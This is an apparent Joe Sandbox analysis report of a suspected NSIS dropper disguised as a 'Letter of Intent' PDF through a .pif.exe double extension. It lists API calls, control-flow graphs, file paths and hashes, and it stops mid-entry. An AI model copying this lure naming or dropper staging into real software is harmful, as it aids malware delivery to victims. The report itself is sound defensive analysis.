                                                                                      Function 00401752 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 727 401752-401777 call 402ad0 call 405825 732 401781-401793 call 405d46 call 4057ae lstrcatW 727->732 733 401779-40177f call 405d46 727->733 739 401798-401799 call 405fda 732->739 733->739 742 40179e-4017a2 739->742 743 4017a4-4017ae call 406089 742->743 744 4017d5-4017d8 742->744 751 4017c0-4017d2 743->751 752 4017b0-4017be CompareFileTime 743->752 746 4017e0-4017fc call 4059cf 744->746 747 4017da-4017db call 4059aa 744->747 754 401870-401899 call 404ffa call 402f38 746->754 755 4017fe-401801 746->755 747->746 751->744 752->751 769 4018a1-4018ad SetFileTime 754->769 770 40189b-40189f 754->770 756 401852-40185c call 404ffa 755->756 757 401803-401841 call 405d46 * 2 call 405d68 call 405d46 call 405529 755->757 767 401865-40186b 756->767 757->742 790 401847-401848 757->790 771 402966 767->771 773 4018b3-4018be CloseHandle 769->773 770->769 770->773 774 402968-40296c 771->774 776 4018c4-4018c7 773->776 777 40295d-402960 773->777 779 4018c9-4018da call 405d68 lstrcatW 776->779 780 4018dc-4018df call 405d68 776->780 777->771 784 4018e4-402241 call 405529 779->784 780->784 784->774 790->767 792 40184a-40184b 790->792 792->756
                                                                                      APIs
                                                                                      • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright\Unsecludedly\Unpulverise,?,?,00000031), ref: 00401793
                                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright\Unsecludedly\Unpulverise,?,?,00000031), ref: 004017B8
                                                                                        • Part of subcall function 00405D46: lstrcpynW.KERNEL32(?,?,00000400,0040324B,00433EA0,NSIS Error), ref: 00405D53
                                                                                        • Part of subcall function 00404FFA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000000,0041D5A8,74DF23A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
                                                                                        • Part of subcall function 00404FFA: lstrlenW.KERNEL32(0040309B,Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000000,0041D5A8,74DF23A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
                                                                                        • Part of subcall function 00404FFA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,0040309B,0040309B,Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000000,0041D5A8,74DF23A0), ref: 00405055
                                                                                        • Part of subcall function 00404FFA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll), ref: 00405067
                                                                                        • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
                                                                                        • Part of subcall function 00404FFA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
                                                                                        • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp$C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright\Unsecludedly\Unpulverise$Call
                                                                                      • API String ID: 1941528284-2271683037
                                                                                      • Opcode ID: 3aef993f2f1c5c5f9c4166460f4e10ce30a2b5bd1f3b48b1ad82892f2aa20fb1
                                                                                      • Instruction ID: d3e4dca81327e3df0df284c572be3abc4bccaf2f3cb66fe1cef89d7a827d5624
                                                                                      • Opcode Fuzzy Hash: 3aef993f2f1c5c5f9c4166460f4e10ce30a2b5bd1f3b48b1ad82892f2aa20fb1
                                                                                      • Instruction Fuzzy Hash: 9B419171900505BBCF10BBB5DC8ADAF3665EF06369B20823BF012B11E1D63C8A519A6D
                                                                                      Function 00404FFA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 793 404ffa-40500f 794 405015-405026 793->794 795 4050c6-4050ca 793->795 796 405031-40503d lstrlenW 794->796 797 405028-40502c call 405d68 794->797 799 40505a-40505e 796->799 800 40503f-40504f lstrlenW 796->800 797->796 802 405060-405067 SetWindowTextW 799->802 803 40506d-405071 799->803 800->795 801 405051-405055 lstrcatW 800->801 801->799 802->803 804 405073-4050b5 SendMessageW * 3 803->804 805 4050b7-4050b9 803->805 804->805 805->795 806 4050bb-4050be 805->806 806->795
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000000,0041D5A8,74DF23A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
                                                                                      • lstrlenW.KERNEL32(0040309B,Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000000,0041D5A8,74DF23A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
                                                                                      • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,0040309B,0040309B,Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000000,0041D5A8,74DF23A0), ref: 00405055
                                                                                      • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll), ref: 00405067
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                      • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll
                                                                                      • API String ID: 2531174081-1131423764
                                                                                      • Opcode ID: 671efdfc4b123df1b42670911b49c5f72c5e00122fc07205780e32bafcf4a041
                                                                                      • Instruction ID: 2c8a209b838051fcdbb8fb1d9598827595890bd21b84812adf7dff8cdb9255f5
                                                                                      • Opcode Fuzzy Hash: 671efdfc4b123df1b42670911b49c5f72c5e00122fc07205780e32bafcf4a041
                                                                                      • Instruction Fuzzy Hash: E1216071900618BADB219F65DD859DFBFB9EF45750F14803AF904B62A0C3794A40CF98
                                                                                      Function 00402F38 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 175fileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 807 402f38-402f51 808 402f53 807->808 809 402f5a-402f62 807->809 808->809 810 402f64 809->810 811 402f6b-402f70 809->811 810->811 812 402f80-402f8d call 403160 811->812 813 402f72-402f7b call 403192 811->813 817 402f93-402f97 812->817 818 40310d 812->818 813->812 820 4030f6-4030f8 817->820 821 402f9d-402fe4 GetTickCount 817->821 819 40310f-403110 818->819 822 403159-40315d 819->822 823 4030fa-4030fd 820->823 824 40314c-40314f 820->824 825 403156 821->825 826 402fea-402ff2 821->826 831 403102-40310b call 403160 823->831 832 4030ff 823->832 829 403151 824->829 830 403112-403118 824->830 825->822 827 402ff4 826->827 828 402ff7-403005 call 403160 826->828 827->828 828->818 841 40300b-403014 828->841 829->825 834 40311a 830->834 835 40311d-40312b call 403160 830->835 831->818 840 403153 831->840 832->831 834->835 835->818 844 40312d-40313f WriteFile 835->844 840->825 843 40301a-40303a call 4061cc 841->843 850 403040-403053 GetTickCount 843->850 851 4030ee-4030f0 843->851 846 403141-403144 844->846 847 4030f2-4030f4 844->847 846->847 849 403146-403149 846->849 847->819 849->824 852 403055-40305d 850->852 853 40309e-4030a2 850->853 851->819 854 403065-403096 MulDiv wsprintfW call 404ffa 852->854 855 40305f-403063 852->855 856 4030e3-4030e6 853->856 857 4030a4-4030a7 853->857 864 40309b 854->864 855->853 855->854 856->826 860 4030ec 856->860 858 4030c9-4030d4 857->858 859 4030a9-4030bd WriteFile 857->859 863 4030d7-4030db 858->863 859->847 862 4030bf-4030c2 859->862 860->825 862->847 865 4030c4-4030c7 862->865 863->843 866 4030e1 863->866 864->853 865->863 866->825
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00402FA3
                                                                                      • GetTickCount.KERNEL32 ref: 00403048
                                                                                      • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403071
                                                                                      • wsprintfW.USER32 ref: 00403084
                                                                                      • WriteFile.KERNELBASE(00000000,00000000,0041D5A8,00402ED2,00000000), ref: 004030B5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountTick$FileWritewsprintf
                                                                                      • String ID: ... %d%%
                                                                                      • API String ID: 4209647438-2449383134
                                                                                      • Opcode ID: 61ddf02fd636ed85020eb85095074430f0604a488243a9e3d908ba4f2f9dd09b
                                                                                      • Instruction ID: 34a6cf203725df572fb249859d8c599c0d8718bcf9279d6af528d8a937ec08d1
                                                                                      • Opcode Fuzzy Hash: 61ddf02fd636ed85020eb85095074430f0604a488243a9e3d908ba4f2f9dd09b
                                                                                      • Instruction Fuzzy Hash: 53617B71901219EBCB10DFA5DA4469F7FB8AF08355F10453BE914BB2C0D7789E40DBA9
                                                                                      Function 00402571 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 105fileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 867 402571-402580 call 402ab3 870 402586-40258d 867->870 871 40295d-402960 867->871 873 402592-402595 870->873 874 40258f 870->874 872 402966-40296c 871->872 876 40259b-4025aa call 405ca6 873->876 877 40267f-402684 873->877 874->873 876->877 880 4025b0 876->880 877->871 881 4025b6-4025bf 880->881 882 4025c1-4025ce ReadFile 881->882 883 4025fe-40260b ReadFile 881->883 882->877 884 4025d4-4025d8 882->884 883->877 885 40260d-402611 883->885 884->877 886 4025de-4025f4 MultiByteToWideChar 884->886 885->877 887 402613 885->887 886->887 888 4025f6-4025fc 886->888 889 402616-402619 887->889 888->889 890 402644-402650 call 405c8d 889->890 891 40261b-402620 889->891 890->872 893 402622-402627 891->893 894 402655-402659 891->894 893->894 898 402629-402637 893->898 896 402671-402679 SetFilePointer 894->896 897 40265b-40265f 894->897 896->877 899 402661-402665 897->899 900 402667-40266f 897->900 898->877 901 402639-40263c 898->901 899->896 899->900 900->877 901->881 902 402642 901->902 902->877
                                                                                      APIs
                                                                                      • ReadFile.KERNELBASE(?,?,00000001,?), ref: 004025CA
                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,00000001,?,00000001), ref: 004025EC
                                                                                      • ReadFile.KERNEL32(?,?,00000002,?), ref: 00402607
                                                                                        • Part of subcall function 00405C8D: wsprintfW.USER32 ref: 00405C9A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileRead$ByteCharMultiWidewsprintf
                                                                                      • String ID: 9
                                                                                      • API String ID: 3029736425-2366072709
                                                                                      • Opcode ID: 6119b3fc78681a85ba9cd50a76468ca8cd985537187a5c82c8e636e21472dda3
                                                                                      • Instruction ID: 3f2e9d39a30109d4dd297e12bf5cacaacaa6ae2deeb589865bf4cc510dd46cad
                                                                                      • Opcode Fuzzy Hash: 6119b3fc78681a85ba9cd50a76468ca8cd985537187a5c82c8e636e21472dda3
                                                                                      • Instruction Fuzzy Hash: 1A315E7190021AAADF20DF94DA88EBEB7B9EB14344F50443BE401F62D4D7B98A818B59
                                                                                      Function 0040232F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 903 40232f-402375 call 402bc5 call 402ad0 * 2 RegCreateKeyExW 910 40237b-402383 903->910 911 40295d-40296c 903->911 913 402385-402392 call 402ad0 lstrlenW 910->913 914 402396-402399 910->914 913->914 917 4023a9-4023ac 914->917 918 40239b-4023a8 call 402ab3 914->918 921 4023bd-4023d1 RegSetValueExW 917->921 922 4023ae-4023b8 call 402f38 917->922 918->917 925 4023d3 921->925 926 4023d6-4024b0 RegCloseKey 921->926 922->921 925->926 926->911 928 402729-402730 926->928 928->911
                                                                                      APIs
                                                                                      • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
                                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
                                                                                      • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
                                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateValuelstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp
                                                                                      • API String ID: 1356686001-962690132
                                                                                      • Opcode ID: b14322960acd1b0899462d2edba4aa648c0e9e13e837c4cbbdf2a49f0704e9f9
                                                                                      • Instruction ID: ae8cd99e4777b9a91f11086a6aa50b0fceabbd5df02328ddbc6dea80253d30cd
                                                                                      • Opcode Fuzzy Hash: b14322960acd1b0899462d2edba4aa648c0e9e13e837c4cbbdf2a49f0704e9f9
                                                                                      • Instruction Fuzzy Hash: 73119371A00109BFEB10EFA1DE49EAF7A7CEB40358F11403AF505B61D0DBB85D409B68
                                                                                      Function 004015B9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 929 4015b9-4015cd call 402ad0 call 405859 934 401614-401617 929->934 935 4015cf-4015eb call 4057db CreateDirectoryW 929->935 937 401646-402195 call 401423 934->937 938 401619-401638 call 401423 call 405d46 SetCurrentDirectoryW 934->938 942 40160a-401612 935->942 943 4015ed-4015f8 GetLastError 935->943 950 402729-402730 937->950 951 40295d-40296c 937->951 938->951 954 40163e-401641 938->954 942->934 942->935 946 401607 943->946 947 4015fa-401605 GetFileAttributesW 943->947 946->942 947->942 947->946 950->951 954->951
                                                                                      APIs
                                                                                        • Part of subcall function 00405859: CharNextW.USER32(?,?,0042FA00,?,004058CD,0042FA00,0042FA00,?,?,74DF3420,004055F5,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"), ref: 00405867
                                                                                        • Part of subcall function 00405859: CharNextW.USER32(00000000), ref: 0040586C
                                                                                        • Part of subcall function 00405859: CharNextW.USER32(00000000), ref: 00405884
                                                                                      • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                                      • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright\Unsecludedly\Unpulverise,?,00000000,000000F0), ref: 00401630
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright\Unsecludedly\Unpulverise, xrefs: 00401623
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright\Unsecludedly\Unpulverise
                                                                                      • API String ID: 3751793516-1474987328
                                                                                      • Opcode ID: 084d11175c175d59b55e220763c689c2ab80c9fde4551d9ac959b79aba26f047
                                                                                      • Instruction ID: 35652dd05d7f301adf099aa328e5cc987f695832d4750e36514a93e4da09e5cd
                                                                                      • Opcode Fuzzy Hash: 084d11175c175d59b55e220763c689c2ab80c9fde4551d9ac959b79aba26f047
                                                                                      • Instruction Fuzzy Hash: B9113231600115EBCB206FA0DD44AAE3BB0EF053A9B24053BF882B22E0D6394981DB5D
                                                                                      Function 00402B10 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 956 402b10-402b39 RegOpenKeyExW 957 402ba4-402ba8 956->957 958 402b3b-402b46 956->958 959 402b61-402b71 RegEnumKeyW 958->959 960 402b73-402b85 RegCloseKey call 4060b0 959->960 961 402b48-402b4b 959->961 969 402b87-402b96 960->969 970 402bab-402bb1 960->970 962 402b98-402b9b RegCloseKey 961->962 963 402b4d-402b5f call 402b10 961->963 965 402ba1-402ba3 962->965 963->959 963->960 965->957 969->957 970->965 971 402bb3-402bc1 RegDeleteKeyW 970->971 971->965 972 402bc3 971->972 972->957
                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B31
                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402B6D
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402B76
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402B9B
                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402BB9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Close$DeleteEnumOpen
                                                                                      • String ID:
                                                                                      • API String ID: 1912718029-0
                                                                                      • Opcode ID: e209337d4f07f6f8c2a4ceb8af3950f4050bc43b96735d64bbc969474f32ba56
                                                                                      • Instruction ID: 30c1bee4f6ef5540a549b97fb3682634b1066eef3f365ecf60e24fe04a280a9b
                                                                                      • Opcode Fuzzy Hash: e209337d4f07f6f8c2a4ceb8af3950f4050bc43b96735d64bbc969474f32ba56
                                                                                      • Instruction Fuzzy Hash: F6113A71500108BFDF109F90DE89DAE3B79EB44348F10447AFA15B11A0D7B9AE55AA18
                                                                                      Function 1000177A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
